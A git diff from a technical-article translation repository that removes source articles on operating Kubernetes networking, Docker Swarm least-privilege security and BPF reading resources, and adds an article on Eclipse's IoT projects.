that at some level all of this networking complexity isn’t strictly required and sometimes you can get away without using it. Avoiding networking complexity seems like a good idea to me if you can. - -### Operating an overlay network - -The first networking component we’re going to talk about is your overlay network. Kubernetes assumes that every pod has an IP address and that you can communicate with services inside that pod by using that IP address. When I say “overlay network” this is what I mean (“the system that lets you refer to a pod by its IP address”). - -All other Kubernetes networking stuff relies on the overlay networking working correctly. You can read more about the [kubernetes networking model here][10]. - -The way Kelsey Hightower describes in [kubernetes the hard way][11] seems pretty good but it’s not really viable on AWS for clusters more than 50 nodes or so, so I’m not going to talk about that. - -There are a lot of overlay network backends (calico, flannel, weaveworks, romana) and the landscape is pretty confusing. But as far as I’m concerned an overlay network has 2 responsibilities: - -1. Make sure your pods can send network requests outside your cluster - -2. Keep a stable mapping of nodes to subnets and keep every node in your cluster updated with that mapping. Do the right thing when nodes are added & removed. - -Okay! So! What can go wrong with your overlay network? - -* The overlay network is responsible for setting up iptables rules (basically `iptables -A -t nat POSTROUTING -s $SUBNET -j MASQUERADE`) to ensure that containers can make network requests outside Kubernetes. If something goes wrong with this rule then your containers can’t connect to the external network. This isn’t that hard (it’s just a few iptables rules) but it is important. I made a [pull request][2] because I wanted to make sure this was resilient - -* Something can go wrong with adding or deleting nodes. We’re using the flannel hostgw backend and at the time we started using it, node deletion [did not work][3]. - -* Your overlay network is probably dependent on a distributed database (etcd). If that database has an incident, this can cause issues. For example [https://github.com/coreos/flannel/issues/610][4] says that if you have data loss in your flannel etcd cluster it can result in containers losing network connectivity. (this has now been fixed) - -* You upgrade Docker and everything breaks - -* Probably more things! - -I’m mostly talking about past issues in Flannel here but I promise I’m not picking on Flannel – I actually really **like** Flannel because I feel like it’s relatively simple (for instance the [vxlan backend part of it][12] is like 500 lines of code) and I feel like it’s possible for me to reason through any issues with it. And it’s obviously continuously improving. They’ve been great about reviewing pull requests. - -My approach to operating an overlay network so far has been: - -* Learn how it works in detail and how to debug it (for example the hostgw network backend for Flannel works by creating routes, so you mostly just need to do `sudo ip route list` to see whether it’s doing the correct thing) - -* Maintain an internal build so it’s easy to patch it if needed - -* When there are issues, contribute patches upstream - -I think it’s actually really useful to go through the list of merged PRs and see bugs that have been fixed in the past – it’s a bit time consuming but is a great way to get a concrete list of kinds of issues other people have run into. - -It’s possible that for other people their overlay networks just work but that hasn’t been my experience and I’ve heard other folks report similar issues. If you have an overlay network setup that is a) on AWS and b) works on a cluster more than 50-100 nodes where you feel more confident about operating it I would like to know. - -### Operating kube-proxy and kube-dns? - -Now that we have some thoughts about operating overlay networks, let’s talk about - -There’s a question mark next to this one because I haven’t done this. Here I have more questions than answers. - -Here’s how Kubernetes services work! A service is a collection of pods, which each have their own IP address (like 10.1.0.3, 10.2.3.5, 10.3.5.6) - -1. Every Kubernetes service gets an IP address (like 10.23.1.2) - -2. `kube-dns` resolves Kubernetes service DNS names to IP addresses (so my-svc.my-namespace.svc.cluster.local might map to 10.23.1.2) - -3. `kube-proxy` sets up iptables rules in order to do random load balancing between them. Kube-proxy also has a userspace round-robin load balancer but my impression is that they don’t recommend using it. - -So when you make a request to `my-svc.my-namespace.svc.cluster.local`, it resolves to 10.23.1.2, and then iptables rules on your local host (generated by kube-proxy) redirect it to one of 10.1.0.3 or 10.2.3.5 or 10.3.5.6 at random. - -Some things that I can imagine going wrong with this: - -* `kube-dns` is misconfigured - -* `kube-proxy` dies and your iptables rules don’t get updated - -* Some issue related to maintaining a large number of iptables rules - -Let’s talk about the iptables rules a bit, since doing load balancing by creating a bajillion iptables rules is something I had never heard of before! - -kube-proxy creates one iptables rule per target host like this: (these rules are from [this github issue][13]) - -``` --A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.20000000019 -j KUBE-SEP-E4QKA7SLJRFZZ2DD[b][c] --A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.25000000000 -j KUBE-SEP-LZ7EGMG4DRXMY26H --A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.33332999982 -j KUBE-SEP-RKIFTWKKG3OHTTMI --A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.50000000000 -j KUBE-SEP-CGDKBCNM24SZWCMS --A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -j KUBE-SEP-RI4SRNQQXWSTGE2Y - -``` - -So kube-proxy creates a **lot** of iptables rules. What does that mean? What are the implications of that in for my network? There’s a great talk from Huawei called [Scale Kubernetes to Support 50,000 services][14] that says if you have 5,000 services in your kubernetes cluster, it takes **11 minutes** to add a new rule. If that happened to your real cluster I think it would be very bad. - -I definitely don’t have 5,000 services in my cluster, but 5,000 isn’t SUCH a bit number. The proposal they give to solve this problem is to replace this iptables backend for kube-proxy with IPVS which is a load balancer that lives in the Linux kernel. - -It seems like kube-proxy is going in the direction of various Linux kernel based load balancers. I think this is partly because they support UDP load balancing, and other load balancers (like HAProxy) don’t support UDP load balancing. - -But I feel comfortable with HAProxy! Is it possible to replace kube-proxy with HAProxy! I googled this and I found this [thread on kubernetes-sig-network][15] saying: - -> kube-proxy is so awesome, we have used in production for almost a year, it works well most of time, but as we have more and more services in our cluster, we found it was getting hard to debug and maintain. There is no iptables expert in our team, we do have HAProxy&LVS experts, as we have used these for several years, so we decided to replace this distributed proxy with a centralized HAProxy. I think this maybe useful for some other people who are considering using HAProxy with kubernetes, so we just update this project and make it open source: [https://github.com/AdoHe/kube2haproxy][5]. If you found it’s useful , please take a look and give a try. - -So that’s an interesting option! I definitely don’t have answers here, but, some thoughts: - -* Load balancers are complicated - -* DNS is also complicated - -* If you already have a lot of experience operating one kind of load balancer (like HAProxy), it might make sense to do some extra work to use that instead of starting to use an entirely new kind of load balancer (like kube-proxy) - -* I’ve been thinking about where we want to be using kube-proxy or kube-dns at all – I think instead it might be better to just invest in Envoy and rely entirely on Envoy for all load balancing & service discovery. So then you just need to be good at operating Envoy. - -As you can see my thoughts on how to operate your Kubernetes internal proxies are still pretty confused and I’m still not super experienced with them. It’s totally possible that kube-proxy and kube-dns are fine and that they will just work fine but I still find it helpful to think through what some of the implications of using them are (for example “you can’t have 5,000 Kubernetes services”). - -### Ingress - -If you’re running a Kubernetes cluster, it’s pretty likely that you actually need HTTP requests to get into your cluster so far. This blog post is already too long and I don’t know much about ingress yet so we’re not going to talk about that. - -### Useful links - -A couple of useful links, to summarize: - -* [The Kubernetes networking model][6] - -* How GKE networking works: [https://www.youtube.com/watch?v=y2bhV81MfKQ][7] - -* The aforementioned talk on `kube-proxy` performance: [https://www.youtube.com/watch?v=4-pawkiazEg][8] - -### I think networking operations is important - -My sense of all this Kubernetes networking software is that it’s all still quite new and I’m not sure we (as a community) really know how to operate all of it well. This makes me worried as an operator because I really want my network to keep working! :) Also I feel like as an organization running your own Kubernetes cluster you need to make a pretty large investment into making sure you understand all the pieces so that you can fix things when they break. Which isn’t a bad thing, it’s just a thing. - -My plan right now is just to keep learning about how things work and reduce the number of moving parts I need to worry about as much as possible. - -As usual I hope this was helpful and I would very much like to know what I got wrong in this post! - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/10/10/operating-a-kubernetes-network/ - -作者:[Julia Evans ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/about -[1]:http://blog.sophaskins.net/blog/misadventures-with-kube-dns/ -[2]:https://github.com/coreos/flannel/pull/808 -[3]:https://github.com/coreos/flannel/pull/803 -[4]:https://github.com/coreos/flannel/issues/610 -[5]:https://github.com/AdoHe/kube2haproxy -[6]:https://kubernetes.io/docs/concepts/cluster-administration/networking/#kubernetes-model -[7]:https://www.youtube.com/watch?v=y2bhV81MfKQ -[8]:https://www.youtube.com/watch?v=4-pawkiazEg -[9]:https://jvns.ca/categories/kubernetes -[10]:https://kubernetes.io/docs/concepts/cluster-administration/networking/#kubernetes-model -[11]:https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/11-pod-network-routes.md -[12]:https://github.com/coreos/flannel/tree/master/backend/vxlan -[13]:https://github.com/kubernetes/kubernetes/issues/37932 -[14]:https://www.youtube.com/watch?v=4-pawkiazEg -[15]:https://groups.google.com/forum/#!topic/kubernetes-sig-network/3NlBVbTUUU0 diff --git a/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md b/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md deleted file mode 100644 index 7a9b6e817c..0000000000 --- a/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md +++ /dev/null @@ -1,174 +0,0 @@ -# LEAST PRIVILEGE CONTAINER ORCHESTRATION - - -The Docker platform and the container has become the standard for packaging, deploying, and managing applications. In order to coordinate running containers across multiple nodes in a cluster, a key capability is required: a container orchestrator. - -![container orchestrator](https://i0.wp.com/blog.docker.com/wp-content/uploads/f753d4e8-9e22-4fe2-be9a-80661ef696a8-3.jpg?resize=536%2C312&ssl=1) - -Orchestrators are responsible for critical clustering and scheduling tasks, such as: - -* Managing container scheduling and resource allocation. - -* Support service discovery and hitless application deploys. - -* Distribute the necessary resources that applications need to run. - -Unfortunately, the distributed nature of orchestrators and the ephemeral nature of resources in this environment makes securing orchestrators a challenging task. In this post, we will describe in detail the less-considered—yet vital—aspect of the security model of container orchestrators, and how Docker Enterprise Edition with its built-in orchestration capability, Swarm mode, overcomes these difficulties. - -Motivation and threat model -============================================================ - -One of the primary objectives of Docker EE with swarm mode is to provide an orchestrator with security built-in. To achieve this goal, we developed the first container orchestrator designed with the principle of least privilege in mind. - -In computer science,the principle of least privilege in a distributed system requires that each participant of the system must only have access to  the information and resources that are necessary for its legitimate purpose. No more, no less. - -> #### ”A process must be able to access only the information and resources that are necessary for its legitimate purpose.” - -#### Principle of Least Privilege - -Each node in a Docker EE swarm is assigned role: either manager or worker. These roles define a coarsegrained level of privilege to the nodes: administration and task execution, respectively. However, regardless of its role, a node has access only to the information and resources it needs to perform the necessary tasks, with cryptographically enforced guarantees. As a result, it becomes easier to secure clusters against even the most sophisticated attacker models: attackers that control the underlying communication networks or even compromised cluster nodes. - -# Secure-by-default core - -There is an old security maxim that states: if it doesn’t come by default, no one will use it. Docker Swarm mode takes this notion to heart, and ships with secure-by-default mechanisms to solve three of the hardest and most important aspects of the orchestration lifecycle: - -1. Trust bootstrap and node introduction. - -2. Node identity issuance and management. - -3. Authenticated, Authorized, Encrypted information storage and dissemination. - -Let’s look at each of these aspects individually - -### Trust Bootstrap and Node Introduction - -The first step to a secure cluster is tight control over membership and identity. Without it, administrators cannot rely on the identities of their nodes and enforce strict workload separation between nodes. This means that unauthorized nodes can’t be allowed to join the cluster, and nodes that are already part of the cluster aren’t able to change identities, suddenly pretending to be another node. - -To address this need, nodes managed by Docker EE’s Swarm mode maintain strong, immutable identities. The desired properties are cryptographically guaranteed by using two key building-blocks: - -1. Secure join tokens for cluster membership. - -2. Unique identities embedded in certificates issued from a central certificate authority. - -### Joining the Swarm - -To join the swarm, a node needs a copy of a secure join token. The token is unique to each operational role within the cluster—there are currently two types of nodes: workers and managers. Due to this separation, a node with a copy of a worker token will not be allowed to join the cluster as a manager. The only way to get this special token is for a cluster administrator to interactively request it from the cluster’s manager through the swarm administration API. - -The token is securely and randomly generated, but it also has a special syntax that makes leaks of this token easier to detect: a special prefix that you can easily monitor for in your logs and repositories. Fortunately, even if a leak does occur, tokens are easy to rotate, and we recommend that you rotate them often—particularly in the case where your cluster will not be scaling up for a while. - -![Docker Swarm](https://i1.wp.com/blog.docker.com/wp-content/uploads/92d171d4-52c7-4702-8143-110c6f52017c-2.jpg?resize=547%2C208&ssl=1) - -### Bootstrapping trust - -As part of establishing its identity, a new node will ask for a new identity to be issued by any of the network managers. However, under our threat model, all communications can be intercepted by a third-party. This begs the question: how does a node know that it is talking to a legitimate manager? - -![Docker Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/94e3fef0-5bd2-4970-b9e9-25b566d926ad-2.jpg?resize=528%2C348&ssl=1) - -Fortunately, Docker has a built-in mechanism for preventing this from happening. The join token, which the host uses to join the swarm, includes a hash of the root CA’s certificate. The host can therefore use one-way TLS and use the hash to verify that it’s joining the right swarm: if the manager presents a certificate not signed by a CA that matches the hash, the node knows not to trust it. - -### Node identity issuance and management - -Identities in a swarm are embedded in x509 certificates held by each individual node. In a manifestation of the least privilege principle, the certificates’ private keys are restricted strictly to the hosts where they originate. In particular, managers do not have access to private keys of any certificate but their own. - -### Identity Issuance - -To receive their certificates without sharing their private keys, new hosts begin by issuing a certificate signing request (CSR), which the managers then convert into a certificate. This certificate now becomes the new host’s identity, making the node a full-fledged member of the swarm! - -#### -![](https://i0.wp.com/blog.docker.com/wp-content/uploads/415ae6cf-7e76-4ba8-9d84-6d49bf327d8f-2.jpg?resize=548%2C350&ssl=1) - -When used alongside with the secure bootstrapping mechanism, this mechanism for issuing identities to joining nodes is secure by default: all communicating parties are authenticated, authorized and no sensitive information is ever exchanged in clear-text. - -### Identity Renewal - -However, securely joining nodes to a swarm is only part of the story. To minimize the impact of leaked or stolen certificates and to remove the complexity of managing CRL lists, Swarm mode uses short-lived certificates for the identities. These certificates have a default expiration of three months, but can be configured to expire every hour! - -![Docker secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/55e2ab9a-19cd-465d-82c6-fa76110e7ecd-2.jpg?resize=556%2C365&ssl=1) - -This short certificate expiration time means that certificate rotation can’t be a manual process, as it usually is for most PKI systems. With swarm, all certificates are rotated automatically and in a hitless fashion. The process is simple: using a mutually authenticated TLS connection to prove ownership over a particular identity, a Swarm node generates regularly a new public/private key pair and sends the corresponding CSR to be signed, creating a completely new certificate, but maintaining the same identity. - -### Authenticated, Authorized, Encrypted information storage and dissemination. - -During the normal operation of a swarm, information about the tasks has to be sent to the worker nodes for execution. This includes not only information on which containers are to be executed by a node;but also, it includes  all the resources that are necessary for the successful execution of that container, including sensitive secrets such as private keys, passwords, and API tokens. - -### Transport Security - -The fact that every node participating in a swarm is in possession of a unique identity in the form of a X509 certificate, communicating securely between nodes is trivial: nodes can use their respective certificates to establish mutually authenticated connections between one another, inheriting the confidentiality, authenticity and integrity properties of TLS. - -![Swarm Mode](https://i0.wp.com/blog.docker.com/wp-content/uploads/972273a3-d9e5-4053-8fcb-a407c8cdcbf6-2.jpg?resize=347%2C271&ssl=1) - -One interesting detail about Swarm mode is the fact that it uses a push model: only managers are allowed to send information to workers—significantly reducing the surface of attack manager nodes expose to the less privileged worker nodes. - -### Strict Workload Separation Into Security Zones - -One of the responsibilities of manager nodes is deciding which tasks to send to each of the workers. Managers make this determination using a variety of strategies; scheduling the workloads across the swarm depending on both the unique properties of each node and each workload. - -In Docker EE with Swarm mode, administrators have the ability of influencing these scheduling decisions by using labels that are securely attached to the individual node identities. These labels allow administrators to group nodes together into different security zones limiting the exposure of particularly sensitive workloads and any secrets related to them. - -![Docker Swarm Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/67ffa551-d4ae-4522-ba13-4a646a158592-2.jpg?resize=546%2C375&ssl=1) - -### Secure Secret Distribution - -In addition to facilitating the identity issuance process, manager nodes have the important task of storing and distributing any resources needed by a worker. Secrets are treated like any other type of resource, and are pushed down from the manager to the worker over the secure mTLS connection. - -![Docker Secrets](https://i1.wp.com/blog.docker.com/wp-content/uploads/4341da98-2f8c-4aed-bb40-607246344dd8-2.jpg?resize=508%2C326&ssl=1) - -On the hosts, Docker EE ensures that secrets are provided only to the containers they are destined for. Other containers on the same host will not have access to them. Docker exposes secrets to a container as a temporary file system, ensuring that secrets are always stored in memory and never written to disk. This method is more secure than competing alternatives, such as [storing them in environment variables][12]. Once a task completes the secret is gone forever. - -### Storing secrets - -On manager hosts secrets are always encrypted at rest. By default, the key that encrypts these secrets (known as the Data Encryption Key, DEK) is also stored in plaintext on disk. This makes it easy for those with minimal security requirements to start using Docker Swarm mode. - -However, once you are running a production cluster, we recommend you enable auto-lock mode. When auto-lock mode is enabled, a newly rotated DEK is encrypted with a separate Key Encryption Key (KEK). This key is never stored on the cluster; the administrator is responsible for storing it securely and providing it when the cluster starts up. This is known as unlocking the swarm. - -Swarm mode supports multiple managers, relying on the Raft Consensus Algorithm for fault tolerance. Secure secret storage scales seamlessly in this scenario. Each manager host has a unique disk encryption key, in addition to the shared key. Furthermore, Raft logs are encrypted on disk and are similarly unavailable without the KEK when in autolock mode. - -### What happens when a node is compromised? - -![Docker Secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/2a78b37d-bbf0-40ee-a282-eb0900f71ba9-2.jpg?resize=502%2C303&ssl=1) - -In traditional orchestrators, recovering from a compromised host is a slow and complicated process. With Swarm mode, recovery is as easy as running the docker node rm command. This removes the affected node from the cluster, and Docker will take care of the rest, namely re-balancing services and making sure other hosts know not to talk to the affected node. - -As we have seen, thanks to least privilege orchestration, even if the attacker were still active on the host, they would be cut off from the rest of the network. The host’s certificate — its identity — is blacklisted, so the managers will not accept it as valid. - -# Conclusion - -Docker EE with Swarm mode ensures security by default in all key areas of orchestration: - -* Joining the cluster. Prevents malicious nodes from joining the cluster. - -* Organizing hosts into security zones. Prevents lateral movement by attackers. - -* Scheduling tasks. Tasks will be issued only to designated and allowed nodes. - -* Allocating resources. A malicious node cannot “steal” another’s workload or resources. - -* Storing secrets. Never stored in plaintext and never written to disk on worker nodes. - -* Communicating with the workers. Encrypted using mutually authenticated TLS. - -As Swarm mode continues to improve, the Docker team is working to take the principle of least privilege orchestration even further. The task we are tackling is: how can systems remain secure if a manager is compromised? The roadmap is in place, with some of the features already available such as the ability of whitelisting only specific Docker images, preventing managers from executing arbitrary workloads. This is achieved quite naturally using Docker Content Trust. - --------------------------------------------------------------------------------- - -via: https://blog.docker.com/2017/10/least-privilege-container-orchestration/ - -作者:[Diogo Mónica ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://blog.docker.com/author/diogo/ -[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration&summary=The%20Docker%20platform%20and%20the%20container%20has%20become%20the%20standard%20for%20packaging,%20deploying,%20and%20managing%20applications.%20In%20order%20to%20coordinate%20running%20containers%20across%20multiple%20nodes%20in%20a%20cluster,%20a%20key%20capability%20is%20required:%20a%20container%20orchestrator.Orchestrators%20are%20responsible%20for%20critical%20clustering%20and%20scheduling%20tasks,%20such%20as:%20%20%20%20Managing%20... -[2]:http://www.reddit.com/submit?url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration -[3]:https://plus.google.com/share?url=http://dockr.ly/2yZoNdy -[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2yZoNdy&t=Least%20Privilege%20Container%20Orchestration -[5]:https://blog.docker.com/author/diogo/ -[6]:https://blog.docker.com/tag/docker-orchestration/ -[7]:https://blog.docker.com/tag/docker-secrets/ -[8]:https://blog.docker.com/tag/docker-security/ -[9]:https://blog.docker.com/tag/docker-swarm/ -[10]:https://blog.docker.com/tag/least-privilege-orchestrator/ -[11]:https://blog.docker.com/tag/tls/ -[12]:https://diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/ diff --git a/sources/tech/20171020 How Eclipse is advancing IoT development.md b/sources/tech/20171020 How Eclipse is advancing IoT development.md new file mode 100644 index 0000000000..30fd8eb64d --- /dev/null +++ b/sources/tech/20171020 How Eclipse is advancing IoT development.md @@ -0,0 +1,83 @@ +apply for translating + +How Eclipse is advancing IoT development +============================================================ + +### Open source organization's modular approach to development is a good match for the Internet of Things. + +![How Eclipse is advancing IoT development](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/OSDC_BUS_ArchitectureOfParticipation_520x292.png?itok=FA0Uuwzv "How Eclipse is advancing IoT development") +Image by : opensource.com + +[Eclipse][3] may not be the first open source organization that pops to mind when thinking about Internet of Things (IoT) projects. After all, the foundation has been around since 2001, long before IoT was a household word, supporting a community for commercially viable open source software development. + +September's Eclipse IoT Day, held in conjunction with RedMonk's [ThingMonk 2017][4] event, emphasized the big role Eclipse is taking in [IoT development][5]. It currently hosts 28 projects that touch a wide range of IoT needs and projects. While at the conference, I talked with [Ian Skerritt][6], who heads marketing for Eclipse, about Eclipse's IoT projects and how Eclipse thinks about IoT more broadly. + +### What's new about IoT? + +I asked Ian how IoT is different from traditional industrial automation, given that sensors and tools have been connected in factories for the past several decades. Ian notes that many factories still are not connected. + +Additionally, he says, "SCADA [supervisory control and data analysis] systems and even the factory floor technology are very proprietary, very siloed. It's hard to change it. It's hard to adapt to it… Right now, when you set up a manufacturing run, you need to manufacture hundreds of thousands of that piece, of that unit. What [manufacturers] want to do is to meet customer demand, to have manufacturing processes that are very flexible, that you can actually do a lot size of one." That's a big piece of what IoT is bringing to manufacturing. + +### Eclipse's approach to IoT + +He describes Eclipse's involvement in IoT by saying: "There's core fundamental technology that every IoT solution needs," and by using open source, "everyone can use it so they can get broader adoption." He says Eclipse see IoT as consisting of three connected software stacks. At a high level, these stacks mirror the (by now familiar) view that IoT can usually be described as spanning three layers. A given implementation may have even more layers, but they still generally map to the functions of this three-layer model: + +* A stack of software for constrained devices (e.g., the device, endpoint, microcontroller unit (MCU), sensor hardware). + +* Some type of gateway that aggregates information and data from the different sensors and sends it to the network. This layer also may take real-time actions based on what the sensors are observing. + +* A software stack for the IoT platform on the backend. This backend cloud stores the data and can provide services based on collected data, such as analysis of historical trends and predictive analytics. + +The three stacks are described in greater detail in Eclipse's whitepaper "[The Three Software Stacks Required for IoT Architectures][7]." + +Ian says that, when developing a solution within those architectures, "there's very specific things that need to be built, but there's a lot of underlying technology that can be used, like messaging protocols, like gateway services. It needs to be a modular approach to scale up to the different use cases that are up there." This encapsulates Eclipse's activities around IoT: Developing modular open source components that can be used to build a range of business-specific services and solutions. + +### Eclipse's IoT projects + +Of Eclipse's many IoT projects currently in use, Ian says two of the most prominent relate to [MQTT][8], a machine-to-machine (M2M) messaging protocol for IoT. Ian describes it as "a publish‑subscribe messaging protocol that was designed specifically for oil and gas pipeline monitoring where power-management network latency is really important. MQTT has been a great success in terms of being a standard that's being widely adopted in IoT." [Eclipse Mosquitto][9] is MQTT's broker and [Eclipse Paho][10] its client. + +[Eclipse Kura][11] is an IoT gateway that, in Ian's words, "provides northbound and southbound connectivity [for] a lot of different protocols" including Bluetooth, Modbus, controller-area network (CAN) bus, and OPC Unified Architecture, with more being added all the time. One benefit, he says, is "instead of you writing your own connectivity, Kura provides that and then connects you to the network via satellite, via Ethernet, or anything." In addition, it handles firewall configuration, network latency, and other functions. "If the network goes down, it will store messages until it comes back up," Ian says. + +A newer project, [Eclipse Kapua][12], is taking a microservices approach to providing different services for an IoT cloud platform. For example, it handles aspects of connectivity, integration, management, storage, and analysis. Ian describes it as "up and coming. It's not being deployed yet, but Eurotech and Red Hat are very active in that." + +Ian says [Eclipse hawkBit][13], which manages software updates, is one of the "most intriguing projects. From a security perspective, if you can't update your device, you've got a huge security hole." Most IoT security disasters are related to non-updated devices, he says. "HawkBit basically manages the backend of how you do scalable updates across your IoT system." + +Indeed, the difficulty of updating software in IoT devices is regularly cited as one of its biggest security challenges. IoT devices aren't always connected and may be numerous, plus update processes for constrained devices can be hard to consistently get right. For this reason, projects relating to updating IoT software are likely to be important going forward. + +### Why IoT is a good fit for Eclipse + +One of the trends we've seen in IoT development has been around building blocks that are integrated and applied to solve particular business problems, rather than monolithic IoT platforms that apply across industries and companies. This is a good fit with Eclipse's approach to IoT, which focuses on a number of modular stacks; projects that provide specific and commonly needed functions; and brokers, gateways, and protocols that can tie together the components needed for a given implementation. + +-------------------------------------------------------------------------------- + +作者简介: + +Gordon Haff - Gordon Haff is Red Hat’s cloud evangelist, is a frequent and highly acclaimed speaker at customer and industry events, and helps develop strategy across Red Hat’s full portfolio of cloud solutions. He is the author of Computing Next: How the Cloud Opens the Future in addition to numerous other publications. Prior to Red Hat, Gordon wrote hundreds of research notes, was frequently quoted in publications like The New York Times on a wide range of IT topics, and advised clients on product and... + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/10/eclipse-and-iot + +作者:[Gordon Haff ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/ghaff +[1]:https://opensource.com/article/17/10/eclipse-and-iot?rate=u1Wr-MCMFCF4C45IMoSPUacCatoqzhdKz7NePxHOvwg +[2]:https://opensource.com/user/21220/feed +[3]:https://www.eclipse.org/home/ +[4]:http://thingmonk.com/ +[5]:https://iot.eclipse.org/ +[6]:https://twitter.com/ianskerrett +[7]:https://iot.eclipse.org/resources/white-papers/Eclipse%20IoT%20White%20Paper%20-%20The%20Three%20Software%20Stacks%20Required%20for%20IoT%20Architectures.pdf +[8]:http://mqtt.org/ +[9]:https://projects.eclipse.org/projects/technology.mosquitto +[10]:https://projects.eclipse.org/projects/technology.paho +[11]:https://www.eclipse.org/kura/ +[12]:https://www.eclipse.org/kapua/ +[13]:https://eclipse.org/hawkbit/ +[14]:https://opensource.com/users/ghaff +[15]:https://opensource.com/users/ghaff +[16]:https://opensource.com/article/17/10/eclipse-and-iot#comments diff --git a/sources/tech/20171102 Dive into BPF a list of reading material.md b/sources/tech/20171102 Dive into BPF a list of reading material.md deleted file mode 100644 index f4b90bd09d..0000000000 --- a/sources/tech/20171102 Dive into BPF a list of reading material.md +++ /dev/null @@ -1,711 +0,0 @@ -Dive into BPF: a list of reading material -============================================================ - -* [What is BPF?][143] - -* [Dive into the bytecode][144] - -* [Resources][145] - * [Generic presentations][23] - * [About BPF][1] - - * [About XDP][2] - - * [About other components related or based on eBPF][3] - - * [Documentation][24] - * [About BPF][4] - - * [About tc][5] - - * [About XDP][6] - - * [About P4 and BPF][7] - - * [Tutorials][25] - - * [Examples][26] - * [From the kernel][8] - - * [From package iproute2][9] - - * [From bcc set of tools][10] - - * [Manual pages][11] - - * [The code][27] - * [BPF code in the kernel][12] - - * [XDP hooks code][13] - - * [BPF logic in bcc][14] - - * [Code to manage BPF with tc][15] - - * [BPF utilities][16] - - * [Other interesting chunks][17] - - * [LLVM backend][18] - - * [Running in userspace][19] - - * [Commit logs][20] - - * [Troubleshooting][28] - * [Errors at compilation time][21] - - * [Errors at load and run time][22] - - * [And still more!][29] - - _~ [Updated][146] 2017-11-02 ~_ - -# What is BPF? - -BPF, as in **B**erkeley **P**acket **F**ilter, was initially conceived in 1992 so as to provide a way to filter packets and to avoid useless packet copies from kernel to userspace. It initially consisted in a simple bytecode that is injected from userspace into the kernel, where it is checked by a verifier—to prevent kernel crashes or security issues—and attached to a socket, then run on each received packet. It was ported to Linux a couple of years later, and used for a small number of applications (tcpdump for example). The simplicity of the language as well as the existence of an in-kernel Just-In-Time (JIT) compiling machine for BPF were factors for the excellent performances of this tool. - -Then in 2013, Alexei Starovoitov completely reshaped it, started to add new functionalities and to improve the performances of BPF. This new version is designated as eBPF (for “extended BPF”), while the former becomes cBPF (“classic” BPF). New features such as maps and tail calls appeared. The JIT machines were rewritten. The new language is even closer to native machine language than cBPF was. And also, new attach points in the kernel have been created. - -Thanks to those new hooks, eBPF programs can be designed for a variety of use cases, that divide into two fields of applications. One of them is the domain of kernel tracing and event monitoring. BPF programs can be attached to kprobes and they compare with other tracing methods, with many advantages (and sometimes some drawbacks). - -The other application domain remains network programming. In addition to socket filter, eBPF programs can be attached to tc (Linux traffic control tool) ingress or egress interfaces and perform a variety of packet processing tasks, in an efficient way. This opens new perspectives in the domain. - -And eBPF performances are further leveraged through the technologies developed for the IO Visor project: new hooks have also been added for XDP (“eXpress Data Path”), a new fast path recently added to the kernel. XDP works in conjunction with the Linux stack, and relies on BPF to perform very fast packet processing. - -Even some projects such as P4, Open vSwitch, [consider][155] or started to approach BPF. Some others, such as CETH, Cilium, are entirely based on it. BPF is buzzing, so we can expect a lot of tools and projects to orbit around it soon… - -# Dive into the bytecode - -As for me: some of my work (including for [BEBA][156]) is closely related to eBPF, and several future articles on this site will focus on this topic. Logically, I wanted to somehow introduce BPF on this blog before going down to the details—I mean, a real introduction, more developed on BPF functionalities that the brief abstract provided in first section: What are BPF maps? Tail calls? What do the internals look like? And so on. But there are a lot of presentations on this topic available on the web already, and I do not wish to create “yet another BPF introduction” that would come as a duplicate of existing documents. - -So instead, here is what we will do. After all, I spent some time reading and learning about BPF, and while doing so, I gathered a fair amount of material about BPF: introductions, documentation, but also tutorials or examples. There is a lot to read, but in order to read it, one has to  _find_  it first. Therefore, as an attempt to help people who wish to learn and use BPF, the present article introduces a list of resources. These are various kinds of readings, that hopefully will help you dive into the mechanics of this kernel bytecode. - -# Resources - -![](https://qmonnet.github.io/whirl-offload/img/icons/pic.svg) - -### Generic presentations - -The documents linked below provide a generic overview of BPF, or of some closely related topics. If you are very new to BPF, you can try picking a couple of presentation among the first ones and reading the ones you like most. If you know eBPF already, you probably want to target specific topics instead, lower down in the list. - -### About BPF - -Generic presentations about eBPF: - -* [_Making the Kernel’s Networking Data Path Programmable with BPF and XDP_][53]  (Daniel Borkmann, OSSNA17, Los Angeles, September 2017): - One of the best set of slides available to understand quickly all the basics about eBPF and XDP (mostly for network processing). 